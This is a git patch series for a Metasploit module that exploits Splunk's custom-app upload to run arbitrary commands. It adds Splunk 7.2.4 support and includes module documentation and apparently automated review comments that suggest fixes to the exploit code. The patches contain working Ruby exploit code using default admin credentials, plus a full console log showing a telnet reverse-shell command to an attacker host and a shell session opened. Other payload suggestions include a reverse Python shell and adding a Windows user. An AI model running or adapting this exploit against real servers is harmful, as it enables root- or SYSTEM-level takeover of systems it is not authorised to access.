From 4af2b87a790878bad7c9763ac33989a094767d2c Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Sun, 17 Mar 2019 22:23:11 +0100 Subject: [PATCH 01/42] Create splunk_upload_app_exec.md --- .../multi/http/splunk_upload_app_exec.md | 83 +++++++++++++++++++ 1 file changed, 83 insertions(+) create mode 100644 documentation/modules/exploit/multi/http/splunk_upload_app_exec.md diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md new file mode 100644 index 000000000000..d9f7174c9ef5 --- /dev/null +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -0,0 +1,83 @@ +## Vulnerable Application + +This module exploits a feature of Splunk whereby a custom application can be +uploaded through the web based interface. Through the \'script\' search command a +user can call commands defined in their custom application which includes arbitrary +perl or python code. To abuse this behavior, a valid Splunk user with the admin +role is required. By default, this module uses the credential of "admin:changeme", +the default Administrator credential for Splunk. Note that the Splunk web interface +runs as SYSTEM on Windows, or as root on Linux by default. This module has been +tested successfully against Splunk 5.0, 6.1, 6.1.1 and 7.2.4. +Version 7.2.4 has been tested successfully against OSX as well. + +## Verification Steps + + 1. Start msfconsole + 2. Do: ```use exploit/multi/http/splunk_upload_app_exec``` + 3. Set required variables (you will need admin credentials) + 4. Do: ```SET TARGET 1``` + 5. Do: ```SET RHOST 192.168.1.1``` + 6. Do: ```SET USERNAME admin``` + 7. Do: ```SET PASSWORD changeme``` + 8. You should get a reverse shell on port 4444 via the predefined handler. + +## External Demo +[First PoC](http://blog.7elements.co.uk/2012/11/splunk-with-great-power-comes-great-responsibility.html)
+[Metasploit module how-to](http://blog.7elements.co.uk/2012/11/abusing-splunk-with-metasploit.html)
+[SPLUNK API](http://docs.splunk.com/Documentation/Splunk/latest/SearchReference/Script)
+ +## Options + + **EnableOverwrite**
+ Overwrites an app of the same name. Needed if you change the app code in the tgz. + Is not enabled by default. + +## Scenarios + +### Testing against 7.2.4 running on OSX + + Given admin credentials we can upload the custom app to SPLUNK, which will provide us with a reverse shell, triggered by the 'search' field API. + + ``` +msf5 exploit(multi/http/splunk_upload_app_exec) > +msf5 exploit(multi/http/splunk_upload_app_exec) > set RHOST 172.16.165.1 +RHOST => 172.16.165.1 +msf5 exploit(multi/http/splunk_upload_app_exec) > set password splunksplunk +password => splunksplunk +msf5 exploit(multi/http/splunk_upload_app_exec) > show targets + +Exploit targets: + + Id Name + -- ---- + 0 Automatic + 1 Splunk >= 7.2.4 / Linux + 2 Splunk >= 7.2.4 / Windows + 3 Splunk >= 7.2.4 / OSX + 4 Splunk >= 5.0.1 / Linux + 5 Splunk >= 5.0.1 / Windows + + +msf5 exploit(multi/http/splunk_upload_app_exec) > set target 3 +target => 3 +msf5 exploit(multi/http/splunk_upload_app_exec) > exploit + +[*] Started reverse TCP double handler on 172.16.165.206:4444 +[*] Using command: sh -c '(sleep 3733|telnet 172.16.165.206 4444|while : ; do sh && break; done 2>&1|telnet 172.16.165.206 4444 >/dev/null 2>&1 &)' +[*] Authenticating... +[*] Fetching state token from /en-US/manager/appinstall/_upload +[*] Uploading file upload_app_exec.tgz +[+] upload_app_exec successfully uploaded +[*] Invoking script command +[*] Accepted the first client connection... +[*] Accepted the second client connection... +[*] Command: echo 8kNbt70jYB3aJKPm; +[*] Writing to socket A +[*] Writing to socket B +[*] Reading from sockets... +[*] Reading from socket A +[*] A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\n8kNbt70jYB3aJKPm\r\n" +[*] Matching... +[*] B is input... +[*] Command shell session 1 opened (172.16.165.206:4444 -> 172.16.165.1:51512) at 2019-03-17 22:12:33 +0100 + ``` From 7a31fc2d17ab4fd1f54af95dfec65a30fcdd561f Mon Sep 17 00:00:00 2001 
From: Matteo Malvica Date: Mon, 18 Mar 2019 09:12:00 +0100 Subject: [PATCH 02/42] added splunk 7.2.4 support --- .../multi/http/splunk_upload_app_exec.rb | 214 +++++++++++++++--- 1 file changed, 184 insertions(+), 30 deletions(-) diff --git a/modules/exploits/multi/http/splunk_upload_app_exec.rb b/modules/exploits/multi/http/splunk_upload_app_exec.rb index b65740d4c0e1..4454cf2c9ec4 100644 --- a/modules/exploits/multi/http/splunk_upload_app_exec.rb +++ b/modules/exploits/multi/http/splunk_upload_app_exec.rb @@ -20,13 +20,15 @@ def initialize(info = {}) role is required. By default, this module uses the credential of "admin:changeme", the default Administrator credential for Splunk. Note that the Splunk web interface runs as SYSTEM on Windows, or as root on Linux by default. This module has been - tested successfully against Splunk 5.0, 6.1, and 6.1.1.', + tested successfully against Splunk 5.0, 6.1, 6.1.1 and 7.2.4. + Version 7.2.4 has been tested successfully against OSX as well', 'Author' => [ - "marcwickenden", # discovery and metasploit module - "sinn3r", # metasploit module - "juan vazquez", # metasploit module - "Gary Blosser" # metasploit module updates for Splunk 6.1 + "marcwickenden", # discovery and metasploit module + "sinn3r", # metasploit module + "juan vazquez", # metasploit module + "Gary Blosser", # metasploit module updates for Splunk 6.1 + "Matteo Malvica" # metasploit module updates for Splunk 7.2.4 ], 'License' => MSF_LICENSE, 'References' => @@ -40,9 +42,27 @@ def initialize(info = {}) 'Space' => 1024, 'DisableNops' => true }, - 'Platform' => %w(linux unix win), + 'Platform' => %w(linux unix win osx), 'Targets' => [ + [ 'Splunk >= 7.2.4 / Linux', + { + 'Arch' => ARCH_CMD, + 'Platform' => %w(linux unix) + } + ], + [ 'Splunk >= 7.2.4 / Windows', + { + 'Arch' => ARCH_CMD, + 'Platform' => 'win' + } + ], + [ 'Splunk >= 7.2.4 / OSX', + { + 'Arch' => ARCH_CMD, + 'Platform' => %w(linux unix) + } + ], [ 'Splunk >= 5.0.1 / Linux', { 'Arch' => ARCH_CMD, 
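Review bot: The new `Splunk >= 7.2.4 / OSX` target declares `'Platform' => %w(linux unix)`, so although `osx` was added to the module-level Platform list, selecting that target never offers an osx-specific payload; `'Platform' => %w(osx unix)` would match the target's name. The Linux and OSX 7.2.4 targets are otherwise byte-identical, which is presumably intentional because the `cmd/unix/*` payloads used in the documentation are platform-agnostic — a one-line comment on the OSX target saying so would stop the next reader from "fixing" it. The `initialize` method begins before this hunk and the Targets array continues past it.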
@@ -96,36 +116,55 @@ def exploit # set up some variables for later use @auth_cookies = '' @csrf_form_key = '' + @state_token = '' + @splunkweb_csrf_token_8000_id = '' @csrf_form_port = "splunkweb_csrf_token_#{rport}" # Default to using rport, corrected during tokenization for v6 below. + @ver7 = false # splunk version 7 boolean + app_name = 'upload_app_exec' p = payload.encoded print_status("Using command: #{p}") cmd = Rex::Text.encode_base64(p) - # log in to Splunk (if required) - do_login + # check if the target version is 7.2.4 + if target.name.include? "7.2.4" + @ver7 = true + end + + do_login # fetch the csrf token for use in the upload next - do_get_csrf('/en-US/manager/launcher/apps/local') + if @ver7 == true + do_get_state_token('/en-US/manager/appinstall/_upload') + else + do_get_csrf('/en-US/manager/launcher/apps/local') + end unless disable_upload # upload the arbitrary command execution Splunk app tgz - do_upload_app(app_name, file_name) + if @ver7 == true + do_upload_app_7(app_name, file_name) + else + do_upload_app(app_name, file_name) + end end - # get the next csrf token from our new app - do_get_csrf("/en-US/app/#{app_name}/flashtimeline") - + if @ver7 == false + # get the next csrf token from our new app + do_get_csrf("/en-US/app/#{app_name}/flashtimeline") + end + # call our command execution function with the Splunk 'script' command print_status("Invoking script command") - res = send_request_cgi( - 'uri' => '/en-US/api/search/jobs', + if @ver7 == true + res = send_request_cgi( + 'uri' => '/en-US/splunkd/__raw/servicesNS/admin/search/search/jobs', 'method' => 'POST', - 'cookie' => "#{@auth_cookies}; #{@csrf_form_port}=#{@csrf_form_key}", # Version 6 uses cookies and not just headers, extra cookies should be ignored by Splunk 5 (unverified) + 'cookie' => "#{@auth_cookies};", # Version 6 uses cookies and not just headers, extra cookies should be ignored by Splunk 5 (unverified) 'headers' => { 'X-Requested-With' => 'XMLHttpRequest', - 
'X-Splunk-Form-Key' => @csrf_form_key # Version 6 ignores extra headers (verified) + 'X-Splunk-Form-Key' => @splunkweb_csrf_token_8000_id # Version 6 ignores extra headers (verified) }, 'vars_post' => { @@ -143,11 +182,44 @@ def exploit 'timeFormat' => "%s.%Q" } ) + else + res = send_request_cgi( + 'uri' => '/en-US/api/search/jobs', + 'method' => 'POST', + 'cookie' => "#{@auth_cookies}; #{@csrf_form_port}=#{@csrf_form_key}", # Version 6 uses cookies and not just headers, extra cookies should be ignored by Splunk 5 (unverified) + 'headers' => + { + 'X-Requested-With' => 'XMLHttpRequest', + 'X-Splunk-Form-Key' => @csrf_form_key # Version 6 ignores extra headers (verified) + }, + 'vars_post' => + { + 'search' => "search * | script msf_exec #{cmd}", # msf_exec defined in default/commands.conf + 'status_buckets' => "300", + 'namespace' => "#{app_name}", + 'ui_dispatch_app' => "#{app_name}", + 'ui_dispatch_view' => "flashtimeline", + 'auto_cancel' => "100", + 'wait' => "0", + 'required_field_list' => "*", + 'adhoc_search_level' => "smart", + 'earliest_time' => "0", + 'latest_time' => "", + 'timeFormat' => "%s.%Q" + } + ) + end if return_output + if ver7 == true + res.body.match('sid.*') + job_id_blob = Regexp.last_match(0) + job_id_blob2 = job_id_blob.split('>')[1] + job_id = job_id_blob2.split('<')[0] + else res.body.match(/data":\ "([0-9.]+)"/) job_id = Regexp.last_match(1) - + end # wait a short time to let the output be produced print_status("Waiting for #{command_output_delay} seconds to retrieve command output") select(nil, nil, nil, command_output_delay) 
@@ -231,25 +303,48 @@ def do_login if !res fail_with(Failure::Unreachable, "No response") + elsif res.code != 200 + fail_with(Failure::Unreachable, "Authentication failed") + + elsif @ver7 == true + splunkweb_csrf_token_8000_port = '' + @splunkweb_csrf_token_8000_id = '' + splunkd_8000_port = '' + splunkd_8000_id = '' + + #puts res + res.get_cookies.split(';').each do |c| + c.split(',').each do |v| + if v.split('=')[0] =~ /splunkweb_csrf_token_8000/ + splunkweb_csrf_token_8000_port = v.split('=')[0] + @splunkweb_csrf_token_8000_id = v.split('=')[1] + elsif v.split('=')[0] =~ /splunkd_8000/ # regex as the full name is something like splunkweb_csrf_token_8000 + splunkd_8000_port = v.split('=')[0] # Accounting for tunnels where rport is not the actual server-side port + splunkd_8000_id = v.split('=')[1] + end + end + @auth_cookies = "session_id_8000=37305a4fb182fadd28a1591b64a0b22b0765159e;#{splunkweb_csrf_token_8000_port}=#{@splunkweb_csrf_token_8000_id};#{splunkd_8000_port}=#{splunkd_8000_id}; splunkweb_uid=30A93112-7681-4C0D-B1F6-17CAB1FA2735;login=true" + end + else - session_id_port = '' - session_id = '' - res.get_cookies.split(';').each do |c| - c.split(',').each do |v| - if v.split('=')[0] =~ /session_id/ - session_id_port = v.split('=')[0] - session_id = v.split('=')[1] + session_id_port = '' + session_id = '' + res.get_cookies.split(';').each do |c| + c.split(',').each do |v| + if v.split('=')[0] =~ /session_id/ + session_id_port = v.split('=')[0] + session_id = v.split('=')[1] + end end end - end - @auth_cookies = "#{session_id_port}=#{session_id}" + @auth_cookies = "#{session_id_port}=#{session_id}" end end - + def do_upload_app(app_name, file_name) archive_file_name = ::File.basename(file_name) print_status("Uploading file #{archive_file_name}") - file_data = ::File.open(file_name, "rb") { |f| f.read } + file_data = ::File.read(file_name) boundary = '--------------' + rand_text_alphanumeric(6) 
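Review bot: The 7.x `@auth_cookies` string embeds two literal values captured from the author's lab session — `session_id_8000=37305a4fb182fadd28a1591b64a0b22b0765159e` and `splunkweb_uid=30A93112-7681-4C0D-B1F6-17CAB1FA2735` — that have no relation to the target being attacked; only the cookies actually returned by the login response should be replayed, e.g. `@auth_cookies = "#{splunkweb_csrf_token_8000_port}=#{@splunkweb_csrf_token_8000_id};#{splunkd_8000_port}=#{splunkd_8000_id}"`. The cookie-name regexes `/splunkweb_csrf_token_8000/` and `/splunkd_8000/` hard-code port 8000 even though the surrounding code derives `@csrf_form_port` from rport to cope with tunnels and non-default ports, so a Splunk Web instance on another port never matches and both variables stay empty. `res.code != 200` is reported as `Failure::Unreachable` although the host clearly answered; `Failure::NoAccess` with the status code in the message is the accurate classification for a rejected login. `do_login` begins outside this hunk.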
@@ -286,6 +381,48 @@ def do_upload_app(app_name, file_name) end end + # version 7.2.x only + def do_upload_app_7(app_name, file_name) + archive_file_name = ::File.basename(file_name) + print_status("Uploading file #{archive_file_name}") + file_data = ::File.read(file_name) + + boundary = '---------------------------' + rand_text_numeric(29) + + data = "--#{boundary}\r\n" + data << "Content-Disposition: form-data; name=\"state\"\r\n" + data << "\r\n#{@state_token}\r\n" + + data << "--#{boundary}\r\n" + data << "Content-Disposition: form-data; name=\"splunk_form_key\"\r\n" + data << "\r\n#{@splunkweb_csrf_token_8000_id}\r\n" + + data << "--#{boundary}\r\n" + data << "Content-Disposition: form-data; name=\"appfile\"; filename=\"#{archive_file_name}\"\r\n" + data << "Content-Type: application/x-compressed-tar\r\n\r\n" + data << file_data + data << "\r\n--#{boundary}\r\n" + + data << "Content-Disposition: form-data; name=\"force\"\r\n\r\n" + data << "1" + data << "\r\n--#{boundary}--\r\n" + + res = send_request_cgi( + { + 'uri' => '/en-US/manager/appinstall/_upload', + 'method' => 'POST', + 'cookie' => "#{@auth_cookies};", + 'ctype' => "multipart/form-data; boundary=#{boundary}", + 'data' => data + }, 30) + + if res && (res.code == 303 || (res.code == 200 && res.body !~ /There was an error processing the upload/)) + print_good("#{app_name} successfully uploaded") + else + fail_with(Failure::Unknown, "Error uploading") + end + end + def do_get_csrf(uri) print_status("Fetching csrf token from #{uri}") res = send_request_cgi( 
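Review bot: `do_upload_app_7` always sends `force=1`, so on 7.x an existing app of the same name is overwritten regardless of the `EnableOverwrite` option the module documentation describes as off by default; the field should follow the option, e.g. `data << (datastore['EnableOverwrite'] ? '1' : '0')`, presuming the 5.x/6.x path (outside this hunk) honours it. The success test accepts any HTTP 200 whose body lacks the string `There was an error processing the upload`, which also passes on a re-displayed login page or an unrelated error page; requiring the 303 redirect, or the app name in the response body, would be a tighter signal. On failure `Failure::Unknown` is raised without the status code or body, which discards the only evidence available in the field — `fail_with(Failure::UnexpectedReply, "Error uploading app (HTTP #{res&.code})")` keeps it.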
@@ -306,10 +443,27 @@ def do_get_csrf(uri) end end end - fail_with(Failure::Unknown, "csrf form Key not found") unless @csrf_form_key end + # version 7.2.x only + def do_get_state_token(uri) + print_status("Fetching state token from #{uri}") + res = send_request_cgi( + 'uri' => uri, + 'method' => 'GET', + 'cookie' => @auth_cookies + ) + #puts res + res.body.match('name=\"state\" value="(.*)"') # Version 5 + @state_token = Regexp.last_match(1) + + unless @state_token + fail_with(Failure::Unknown, "state token form Key not found") unless @state_token + + end + end + def fetch_job_output(job_id) # fetch the output of our job id as csv for easy parsing print_status("Fetching job_output for id #{job_id}") From c5871d8a5da9900157d6fb3012db743c8db062ee Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Mon, 18 Mar 2019 09:13:01 +0100 Subject: [PATCH 03/42] adding documentation to splunk modukle --- .../multi/http/lesplunk_upload_app_exec.md | 83 +++++++++++++++++++ 1 file changed, 83 insertions(+) create mode 100644 documentation/modules/exploit/multi/http/lesplunk_upload_app_exec.md diff --git a/documentation/modules/exploit/multi/http/lesplunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/lesplunk_upload_app_exec.md new file mode 100644 index 000000000000..d9f7174c9ef5 --- /dev/null +++ b/documentation/modules/exploit/multi/http/lesplunk_upload_app_exec.md 
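Review bot: This hunk deletes `fail_with(Failure::Unknown, "csrf form Key not found") unless @csrf_form_key` from `do_get_csrf`, so on the 5.x/6.x path a missing CSRF token no longer aborts and the module proceeds to upload with an empty `X-Splunk-Form-Key`; that check should stay. The new `do_get_state_token` dereferences `res.body` without checking `res` for nil, uses a greedy `value="(.*)"` that captures up to the last quote on the line, carries a copy-pasted `# Version 5` comment on 7.x-only code, and wraps `fail_with ... unless @state_token` in a redundant outer `unless @state_token`. A tighter version is below; `do_get_csrf` begins and `fetch_job_output` ends outside this hunk.
```ruby
      # … unchanged: do_get_csrf cookie/header parsing …
      fail_with(Failure::Unknown, "csrf form Key not found") unless @csrf_form_key
    end

    # version 7.2.x only: the app-install form carries a per-page 'state' token
    def do_get_state_token(uri)
      print_status("Fetching state token from #{uri}")
      res = send_request_cgi(
        'uri'    => uri,
        'method' => 'GET',
        'cookie' => @auth_cookies
      )
      fail_with(Failure::Unreachable, "No response") unless res
      res.body.match(/name="state"\s+value="([^"]*)"/)
      @state_token = Regexp.last_match(1)
      fail_with(Failure::Unknown, "state token form key not found") if @state_token.nil? || @state_token.empty?
    end
```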
@@ -0,0 +1,83 @@ +## Vulnerable Application + +This module exploits a feature of Splunk whereby a custom application can be +uploaded through the web based interface. Through the \'script\' search command a +user can call commands defined in their custom application which includes arbitrary +perl or python code. To abuse this behavior, a valid Splunk user with the admin +role is required. By default, this module uses the credential of "admin:changeme", +the default Administrator credential for Splunk. Note that the Splunk web interface +runs as SYSTEM on Windows, or as root on Linux by default. This module has been +tested successfully against Splunk 5.0, 6.1, 6.1.1 and 7.2.4. +Version 7.2.4 has been tested successfully against OSX as well. + +## Verification Steps + + 1. Start msfconsole + 2. Do: ```use exploit/multi/http/splunk_upload_app_exec``` + 3. Set required variables (you will need admin credentials) + 4. Do: ```SET TARGET 1``` + 5. Do: ```SET RHOST 192.168.1.1``` + 6. Do: ```SET USERNAME admin``` + 7. Do: ```SET PASSWORD changeme``` + 8. You should get a reverse shell on port 4444 via the predefined handler. + +## External Demo +[First PoC](http://blog.7elements.co.uk/2012/11/splunk-with-great-power-comes-great-responsibility.html)
+[Metasploit module how-to](http://blog.7elements.co.uk/2012/11/abusing-splunk-with-metasploit.html)
+[SPLUNK API](http://docs.splunk.com/Documentation/Splunk/latest/SearchReference/Script)
+ +## Options + + **EnableOverwrite**
+ Overwrites an app of the same name. Needed if you change the app code in the tgz. + Is not enabled by default. + +## Scenarios + +### Testing against 7.2.4 running on OSX + + Given admin credentials we can upload the custom app to SPLUNK, which will provide us with a reverse shell, triggered by the 'search' field API. + + ``` +msf5 exploit(multi/http/splunk_upload_app_exec) > +msf5 exploit(multi/http/splunk_upload_app_exec) > set RHOST 172.16.165.1 +RHOST => 172.16.165.1 +msf5 exploit(multi/http/splunk_upload_app_exec) > set password splunksplunk +password => splunksplunk +msf5 exploit(multi/http/splunk_upload_app_exec) > show targets + +Exploit targets: + + Id Name + -- ---- + 0 Automatic + 1 Splunk >= 7.2.4 / Linux + 2 Splunk >= 7.2.4 / Windows + 3 Splunk >= 7.2.4 / OSX + 4 Splunk >= 5.0.1 / Linux + 5 Splunk >= 5.0.1 / Windows + + +msf5 exploit(multi/http/splunk_upload_app_exec) > set target 3 +target => 3 +msf5 exploit(multi/http/splunk_upload_app_exec) > exploit + +[*] Started reverse TCP double handler on 172.16.165.206:4444 +[*] Using command: sh -c '(sleep 3733|telnet 172.16.165.206 4444|while : ; do sh && break; done 2>&1|telnet 172.16.165.206 4444 >/dev/null 2>&1 &)' +[*] Authenticating... +[*] Fetching state token from /en-US/manager/appinstall/_upload +[*] Uploading file upload_app_exec.tgz +[+] upload_app_exec successfully uploaded +[*] Invoking script command +[*] Accepted the first client connection... +[*] Accepted the second client connection... +[*] Command: echo 8kNbt70jYB3aJKPm; +[*] Writing to socket A +[*] Writing to socket B +[*] Reading from sockets... +[*] Reading from socket A +[*] A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\n8kNbt70jYB3aJKPm\r\n" +[*] Matching... +[*] B is input... +[*] Command shell session 1 opened (172.16.165.206:4444 -> 172.16.165.1:51512) at 2019-03-17 22:12:33 +0100 + ``` From c7d2b6c18efb496bf43cbce343ebc15e3984f80f Mon Sep 17 00:00:00 2001 
From: bcoles Date: Mon, 18 Mar 2019 10:30:54 +0100 Subject: [PATCH 04/42] Update documentation/modules/exploit/multi/http/lesplunk_upload_app_exec.md Co-Authored-By: avanzo --- .../modules/exploit/multi/http/lesplunk_upload_app_exec.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/exploit/multi/http/lesplunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/lesplunk_upload_app_exec.md index d9f7174c9ef5..69872756292c 100644 --- a/documentation/modules/exploit/multi/http/lesplunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/lesplunk_upload_app_exec.md @@ -28,7 +28,7 @@ Version 7.2.4 has been tested successfully against OSX as well. ## Options - **EnableOverwrite**
+ **EnableOverwrite** Overwrites an app of the same name. Needed if you change the app code in the tgz. Is not enabled by default. From 029d42a649a909ca9b8bef046d084a5d39f4b7a0 Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Mon, 18 Mar 2019 10:35:00 +0100 Subject: [PATCH 05/42] included link list --- .../modules/exploit/multi/http/lesplunk_upload_app_exec.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/documentation/modules/exploit/multi/http/lesplunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/lesplunk_upload_app_exec.md index 69872756292c..b1e11a1a0940 100644 --- a/documentation/modules/exploit/multi/http/lesplunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/lesplunk_upload_app_exec.md @@ -22,9 +22,9 @@ Version 7.2.4 has been tested successfully against OSX as well. 8. You should get a reverse shell on port 4444 via the predefined handler. ## External Demo -[First PoC](http://blog.7elements.co.uk/2012/11/splunk-with-great-power-comes-great-responsibility.html)
-[Metasploit module how-to](http://blog.7elements.co.uk/2012/11/abusing-splunk-with-metasploit.html)
-[SPLUNK API](http://docs.splunk.com/Documentation/Splunk/latest/SearchReference/Script)
+* [First PoC](http://blog.7elements.co.uk/2012/11/splunk-with-great-power-comes-great-responsibility.html) +* [Metasploit module how-to](http://blog.7elements.co.uk/2012/11/abusing-splunk-with-metasploit.html) +* [SPLUNK API](http://docs.splunk.com/Documentation/Splunk/latest/SearchReference/Script) ## Options From ba60536585cbd4941e310cf5c141443d34d6b5f8 Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Mon, 18 Mar 2019 12:15:16 +0100 Subject: [PATCH 06/42] duplicate --- .../multi/http/lesplunk_upload_app_exec.md | 83 ------------------- 1 file changed, 83 deletions(-) delete mode 100644 documentation/modules/exploit/multi/http/lesplunk_upload_app_exec.md diff --git a/documentation/modules/exploit/multi/http/lesplunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/lesplunk_upload_app_exec.md deleted file mode 100644 index b1e11a1a0940..000000000000 --- a/documentation/modules/exploit/multi/http/lesplunk_upload_app_exec.md +++ /dev/null 
@@ -1,83 +0,0 @@ -## Vulnerable Application - -This module exploits a feature of Splunk whereby a custom application can be -uploaded through the web based interface. Through the \'script\' search command a -user can call commands defined in their custom application which includes arbitrary -perl or python code. To abuse this behavior, a valid Splunk user with the admin -role is required. By default, this module uses the credential of "admin:changeme", -the default Administrator credential for Splunk. Note that the Splunk web interface -runs as SYSTEM on Windows, or as root on Linux by default. This module has been -tested successfully against Splunk 5.0, 6.1, 6.1.1 and 7.2.4. -Version 7.2.4 has been tested successfully against OSX as well. - -## Verification Steps - - 1. Start msfconsole - 2. Do: ```use exploit/multi/http/splunk_upload_app_exec``` - 3. Set required variables (you will need admin credentials) - 4. Do: ```SET TARGET 1``` - 5. Do: ```SET RHOST 192.168.1.1``` - 6. Do: ```SET USERNAME admin``` - 7. Do: ```SET PASSWORD changeme``` - 8. You should get a reverse shell on port 4444 via the predefined handler. - -## External Demo -* [First PoC](http://blog.7elements.co.uk/2012/11/splunk-with-great-power-comes-great-responsibility.html) -* [Metasploit module how-to](http://blog.7elements.co.uk/2012/11/abusing-splunk-with-metasploit.html) -* [SPLUNK API](http://docs.splunk.com/Documentation/Splunk/latest/SearchReference/Script) - -## Options - - **EnableOverwrite** - Overwrites an app of the same name. Needed if you change the app code in the tgz. - Is not enabled by default. - -## Scenarios - -### Testing against 7.2.4 running on OSX - - Given admin credentials we can upload the custom app to SPLUNK, which will provide us with a reverse shell, triggered by the 'search' field API. 
- - ``` -msf5 exploit(multi/http/splunk_upload_app_exec) > -msf5 exploit(multi/http/splunk_upload_app_exec) > set RHOST 172.16.165.1 -RHOST => 172.16.165.1 -msf5 exploit(multi/http/splunk_upload_app_exec) > set password splunksplunk -password => splunksplunk -msf5 exploit(multi/http/splunk_upload_app_exec) > show targets - -Exploit targets: - - Id Name - -- ---- - 0 Automatic - 1 Splunk >= 7.2.4 / Linux - 2 Splunk >= 7.2.4 / Windows - 3 Splunk >= 7.2.4 / OSX - 4 Splunk >= 5.0.1 / Linux - 5 Splunk >= 5.0.1 / Windows - - -msf5 exploit(multi/http/splunk_upload_app_exec) > set target 3 -target => 3 -msf5 exploit(multi/http/splunk_upload_app_exec) > exploit - -[*] Started reverse TCP double handler on 172.16.165.206:4444 -[*] Using command: sh -c '(sleep 3733|telnet 172.16.165.206 4444|while : ; do sh && break; done 2>&1|telnet 172.16.165.206 4444 >/dev/null 2>&1 &)' -[*] Authenticating... -[*] Fetching state token from /en-US/manager/appinstall/_upload -[*] Uploading file upload_app_exec.tgz -[+] upload_app_exec successfully uploaded -[*] Invoking script command -[*] Accepted the first client connection... -[*] Accepted the second client connection... -[*] Command: echo 8kNbt70jYB3aJKPm; -[*] Writing to socket A -[*] Writing to socket B -[*] Reading from sockets... -[*] Reading from socket A -[*] A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\n8kNbt70jYB3aJKPm\r\n" -[*] Matching... -[*] B is input... -[*] Command shell session 1 opened (172.16.165.206:4444 -> 172.16.165.1:51512) at 2019-03-17 22:12:33 +0100 - ``` From 8ee308da8aef9666de3754fb4410815f42762b86 Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Mon, 18 Mar 2019 12:15:48 +0100 Subject: [PATCH 07/42] Update splunk_upload_app_exec.md --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) 
diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index d9f7174c9ef5..5cf365d7a9cd 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -22,13 +22,13 @@ Version 7.2.4 has been tested successfully against OSX as well. 8. You should get a reverse shell on port 4444 via the predefined handler. ## External Demo -[First PoC](http://blog.7elements.co.uk/2012/11/splunk-with-great-power-comes-great-responsibility.html)
-[Metasploit module how-to](http://blog.7elements.co.uk/2012/11/abusing-splunk-with-metasploit.html)
-[SPLUNK API](http://docs.splunk.com/Documentation/Splunk/latest/SearchReference/Script)
+* [First PoC](http://blog.7elements.co.uk/2012/11/splunk-with-great-power-comes-great-responsibility.html)
+* [Metasploit module how-to](http://blog.7elements.co.uk/2012/11/abusing-splunk-with-metasploit.html)
+* [SPLUNK API](http://docs.splunk.com/Documentation/Splunk/latest/SearchReference/Script)
## Options - **EnableOverwrite**
+ **EnableOverwrite** Overwrites an app of the same name. Needed if you change the app code in the tgz. Is not enabled by default. From 2605611e563bbe2aa43e560ca7769baa3e4d460c Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Mon, 18 Mar 2019 14:37:05 +0100 Subject: [PATCH 08/42] Update splunk_upload_app_exec.md --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index 5cf365d7a9cd..b8c51e459863 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -19,7 +19,14 @@ Version 7.2.4 has been tested successfully against OSX as well. 5. Do: ```SET RHOST 192.168.1.1``` 6. Do: ```SET USERNAME admin``` 7. Do: ```SET PASSWORD changeme``` - 8. You should get a reverse shell on port 4444 via the predefined handler. + + 8. If targeting linux or macos set proper payload + ```SET TARGET [1|3]``` + ```set payload cmd/unix/reverse_python``` + If targeting windows set proper payload + ```SET TARGET 2``` + set payload cmd/windows/adduser + 9. You should get a reverse shell on port 4444 via the predefined handler. ## External Demo * [First PoC](http://blog.7elements.co.uk/2012/11/splunk-with-great-power-comes-great-responsibility.html)
From 70a705a30386b2d2dbe2d3d1926fb58c05136583 Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Mon, 18 Mar 2019 14:41:46 +0100 Subject: [PATCH 09/42] Update splunk_upload_app_exec.md --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index b8c51e459863..b2ddf9dc45b1 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -21,10 +21,10 @@ Version 7.2.4 has been tested successfully against OSX as well. 7. Do: ```SET PASSWORD changeme``` 8. If targeting linux or macos set proper payload - ```SET TARGET [1|3]``` - ```set payload cmd/unix/reverse_python``` + * ```SET TARGET [1|3]``` + *```set payload cmd/unix/reverse_python``` If targeting windows set proper payload - ```SET TARGET 2``` + * ```SET TARGET 2``` set payload cmd/windows/adduser 9. You should get a reverse shell on port 4444 via the predefined handler. From 9e2100ca22a93b195602c90c83eba7822dc79e7d Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Mon, 18 Mar 2019 14:42:33 +0100 Subject: [PATCH 10/42] Update splunk_upload_app_exec.md --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 